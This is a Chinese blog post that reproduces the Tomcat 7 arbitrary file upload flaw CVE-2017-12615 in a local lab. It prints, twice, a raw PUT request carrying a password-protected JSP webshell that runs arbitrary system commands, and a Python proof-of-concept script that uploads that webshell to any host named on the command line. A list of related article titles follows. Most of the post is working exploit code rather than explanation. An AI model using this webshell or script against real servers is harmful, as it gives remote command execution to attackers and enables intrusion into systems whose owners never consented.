Tomcat任意文件上传漏洞CVE-2017-12615复现测试
2017-09-20 19:56
891 查看
今天爆出了一个tomcat7的任意文件上传漏洞,看了大牛们的分析后,我自己本地搭建环境复测。
漏洞影响的tomcat版本为tomcat7.0.0-7.0.81版本
我本地下载的是tomcat7.0.56版本测试
测试过程:
1.下载tomcat7.0.0-7.0.81版本,解压后修改conf/web.xml文件添加readonly参数,属性值为false
如图:
然后启动tomcat
2.上传webshell
使用burpsuite发送构造的的webshell
内容如下:
PUT /123.jsp/ HTTP/1.1
Host: 192.168.23.209:8080
User-Agent: JNTASS
DNT:1
Connection: close
Content-Length: 664
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
这个是大牛的python POC脚本
#! -*- coding:utf-8 -*-
import httplib
import sys
import time
body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'''
try:
conn = httplib.HTTPConnection(sys.argv[1])
conn.request(method='OPTIONS', url='/ffffzz')
headers = dict(conn.getresponse().getheaders())
if 'allow' in headers and \
headers['allow'].find('PUT') > 0 :
conn.close()
conn = httplib.HTTPConnection(sys.argv[1])
url = "/" + str(int(time.time()))+'.jsp/'
#url = "/" + str(int(time.time()))+'.jsp::$DATA'
conn.request( method='PUT', url= url, body=body)
res = conn.getresponse()
if res.status == 201 :
#print 'shell:', 'http://' + sys.argv[1] + url[:-7]
print 'shell:', 'http://' + sys.argv[1] + url[:-1]
elif res.status == 204 :
print 'file exists'
else:
print 'error'
conn.close()
else:
print 'Server not vulnerable'
except Exception,e:
print 'Error:', e
漏洞影响的tomcat版本为tomcat7.0.0-7.0.81版本
我本地下载的是tomcat7.0.56版本测试
测试过程:
1.下载tomcat7.0.0-7.0.81版本,解压后修改conf/web.xml文件添加readonly参数,属性值为false
如图:
然后启动tomcat
2.上传webshell
使用burpsuite发送构造的的webshell
内容如下:
PUT /123.jsp/ HTTP/1.1
Host: 192.168.23.209:8080
User-Agent: JNTASS
DNT:1
Connection: close
Content-Length: 664
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
这个是大牛的python POC脚本
#! -*- coding:utf-8 -*-
import httplib
import sys
import time
body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'''
try:
conn = httplib.HTTPConnection(sys.argv[1])
conn.request(method='OPTIONS', url='/ffffzz')
headers = dict(conn.getresponse().getheaders())
if 'allow' in headers and \
headers['allow'].find('PUT') > 0 :
conn.close()
conn = httplib.HTTPConnection(sys.argv[1])
url = "/" + str(int(time.time()))+'.jsp/'
#url = "/" + str(int(time.time()))+'.jsp::$DATA'
conn.request( method='PUT', url= url, body=body)
res = conn.getresponse()
if res.status == 201 :
#print 'shell:', 'http://' + sys.argv[1] + url[:-7]
print 'shell:', 'http://' + sys.argv[1] + url[:-1]
elif res.status == 204 :
print 'file exists'
else:
print 'error'
conn.close()
else:
print 'Server not vulnerable'
except Exception,e:
print 'Error:', e
相关文章推荐
- 【渗透测试】ApacheTomcat 远程代码执行漏洞复现CVE-2017-12615
- CVE-2017-8464 LNK文件(快捷方式)远程代码执行漏洞复现
- 漏洞复现(CVE-2017-12615)
- 【漏洞复现】Tomcat CVE-2017-12615 远程代码执行漏洞
- MS Office 漏洞CVE-2017-8759复现
- 文件上传漏洞原理与实例测试
- 9 月 19 日,腾讯云安全中心监测到 Apache Tomcat 修复了2个严重级别的漏洞, 分别为: 信息泄露漏洞(CVE-2017-12616)、远程代码执行漏洞(CVE-2017-12615
- CVE-2017-8464远程命令执行漏洞复现
- CVE-2017-8464 远程命令执行漏洞复现
- Tomcat代码执行漏洞(CVE-2017-12615)的演绎及个人bypass
- 2017-4-24(1493037086057未命名文件 测试资源是否正确上传
- 【渗透测试】PHPCMS9.6.0 任意文件上传漏洞+修复方案
- Office隐藏17年的漏洞CVE_2017_11882测试记录
- PHP任意文件上传漏洞CVE-2015-2348浅析
- PHPMailer任意文件读取漏洞分析(CVE-2017-5223)
- Apache Tomcat远程命令执行漏洞(CVE-2017-12615) 漏洞利用到入侵检测
- 文件上传漏洞原理与实例测试
- (CVE-2017-10271)weblogic12.1.3.0漏洞测试与打补丁过程
- Weblogic(CVE-2017-10271)漏洞复现
- PHP任意文件上传漏洞(CVE-2015-2348)